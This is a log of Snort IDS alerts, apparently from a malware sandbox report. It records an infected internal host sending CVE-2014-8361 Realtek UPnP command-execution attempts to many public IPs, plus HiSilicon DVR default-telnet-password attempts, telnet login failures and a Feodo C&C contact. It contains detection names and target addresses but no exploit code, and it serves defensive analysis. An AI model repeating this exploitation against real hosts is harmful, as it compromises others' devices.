Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38296 -> 91.77.228.130:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53564 -> 45.120.207.227:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53564 -> 45.120.207.227:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38300 -> 91.77.228.130:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48318 -> 45.41.80.95:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48318 -> 45.41.80.95:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33468 -> 185.239.59.144:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41804 -> 45.126.154.249:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40736 -> 45.225.59.157:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40736 -> 45.225.59.157:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40738 -> 45.225.59.157:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 45.129.250.218:23 -> 192.168.2.23:59336
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 45.129.250.218:23 -> 192.168.2.23:59336
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45952 -> 45.120.204.114:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45952 -> 45.120.204.114:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53302 -> 91.76.250.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53302 -> 91.76.250.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53308 -> 91.76.250.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43892 -> 45.33.252.55:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43892 -> 45.33.252.55:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48352 -> 45.42.85.122:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48352 -> 45.42.85.122:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60558 -> 185.221.85.31:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60558 -> 185.221.85.31:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60560 -> 185.221.85.31:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35208 -> 45.115.242.113:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35208 -> 45.115.242.113:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45106 -> 45.41.94.230:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45106 -> 45.41.94.230:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 60.32.72.62:23 -> 192.168.2.23:55758
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33442 -> 45.41.80.4:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33442 -> 45.41.80.4:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37872 -> 45.13.245.224:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37872 -> 45.13.245.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33458 -> 45.248.70.162:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33458 -> 45.248.70.162:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57414 -> 91.78.52.254:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57414 -> 91.78.52.254:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57462 -> 91.78.52.254:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.149.84.42:23 -> 192.168.2.23:49598
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.149.84.42:23 -> 192.168.2.23:49598
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50670 -> 91.79.14.233:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50670 -> 91.79.14.233:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50686 -> 91.79.14.233:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40706 -> 45.116.212.68:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40706 -> 45.116.212.68:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32982 -> 91.77.192.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:32982 -> 91.77.192.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32988 -> 91.77.192.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40712 -> 45.116.212.68:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59422 -> 185.131.76.65:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59422 -> 185.131.76.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59426 -> 185.131.76.65:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.23.114.190:23 -> 192.168.2.23:37508
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59592 -> 45.33.250.165:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59592 -> 45.33.250.165:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50376 -> 45.33.243.254:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50376 -> 45.33.243.254:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40794 -> 45.121.83.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40794 -> 45.121.83.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55476 -> 185.215.44.38:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55476 -> 185.215.44.38:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55482 -> 185.215.44.38:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58368 -> 91.77.204.250:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58368 -> 91.77.204.250:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58374 -> 91.77.204.250:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40670 -> 45.33.240.107:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40670 -> 45.33.240.107:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 45.129.250.218:23 -> 192.168.2.23:59512
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 45.129.250.218:23 -> 192.168.2.23:59512
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58880 -> 185.147.56.117:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58880 -> 185.147.56.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58882 -> 185.147.56.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38508 -> 45.33.243.156:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38508 -> 45.33.243.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37256 -> 45.33.251.246:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37256 -> 45.33.251.246:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36052 -> 45.41.84.238:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36052 -> 45.41.84.238:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48302 -> 185.147.58.65:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48302 -> 185.147.58.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48310 -> 185.147.58.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56620 -> 45.60.186.31:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56620 -> 45.60.186.31:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56624 -> 45.60.186.31:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34752 -> 45.115.236.102:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34752 -> 45.115.236.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34758 -> 45.115.236.102:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 199.195.203.26:23 -> 192.168.2.23:49632
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33586 -> 185.241.254.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33586 -> 185.241.254.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33590 -> 185.241.254.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47080 -> 185.245.153.158:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47080 -> 185.245.153.158:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60116 -> 45.43.238.94:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60116 -> 45.43.238.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47084 -> 185.245.153.158:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59842 -> 45.33.241.28:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59842 -> 45.33.241.28:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53042 -> 45.42.92.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53042 -> 45.42.92.42:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 187.36.239.157:23 -> 192.168.2.23:49762
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52474 -> 91.195.120.191:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52474 -> 91.195.120.191:52869
Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.23:51831 -> 45.76.117.129:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:42006 -> 113.165.94.80:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 14.43.161.112:23 -> 192.168.2.23:47304
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59764 -> 45.126.76.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59764 -> 45.126.76.198:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52682 -> 45.120.185.49:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52682 -> 45.120.185.49:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45640 -> 45.133.119.79:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45640 -> 45.133.119.79:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59766 -> 45.126.76.198:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42382 -> 45.126.79.22:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42382 -> 45.126.79.22:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57564 -> 45.158.22.20:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57564 -> 45.158.22.20:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.224.9.14:23 -> 192.168.2.23:36612
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38790 -> 91.140.6.231:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38790 -> 91.140.6.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38808 -> 91.140.6.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59356 -> 45.254.25.253:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59356 -> 45.254.25.253:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52672 -> 91.134.128.81:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52672 -> 91.134.128.81:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52676 -> 91.134.128.81:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.149.84.42:23 -> 192.168.2.23:49842
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.149.84.42:23 -> 192.168.2.23:49842
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45190 -> 45.42.43.160:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45190 -> 45.42.43.160:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45198 -> 45.42.43.160:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.43.161.112:23 -> 192.168.2.23:47304
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.43.161.112:23 -> 192.168.2.23:47304
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 45.129.250.218:23 -> 192.168.2.23:59742
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 45.129.250.218:23 -> 192.168.2.23:59742
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46128 -> 45.195.158.129:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46128 -> 45.195.158.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47194 -> 185.235.183.136:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47194 -> 185.235.183.136:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47200 -> 185.235.183.136:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42410 -> 45.45.156.202:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42410 -> 45.45.156.202:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54040 -> 45.42.92.174:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54040 -> 45.42.92.174:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42446 -> 45.45.156.202:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.1.55.62:23 -> 192.168.2.23:41522
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.1.55.62:23 -> 192.168.2.23:41522
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42364 -> 185.65.161.129:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42364 -> 185.65.161.129:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.86.65.29:23 -> 192.168.2.23:45684
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42396 -> 185.65.161.129:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49956 -> 91.200.121.4:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47736 -> 45.41.95.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47736 -> 45.41.95.166:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:38442 -> 92.27.145.55:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42044 -> 91.78.34.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42044 -> 91.78.34.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42076 -> 91.78.34.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51738 -> 45.248.69.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51738 -> 45.248.69.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35506 -> 45.33.253.91:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35506 -> 45.33.253.91:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.1.55.62:23 -> 192.168.2.23:41680
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.1.55.62:23 -> 192.168.2.23:41680
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36716 -> 166.249.201.245:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 14.43.161.112:23 -> 192.168.2.23:47610
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47514 -> 91.77.141.53:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47514 -> 91.77.141.53:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47538 -> 91.77.141.53:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48208 -> 185.235.183.253:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48208 -> 185.235.183.253:52869
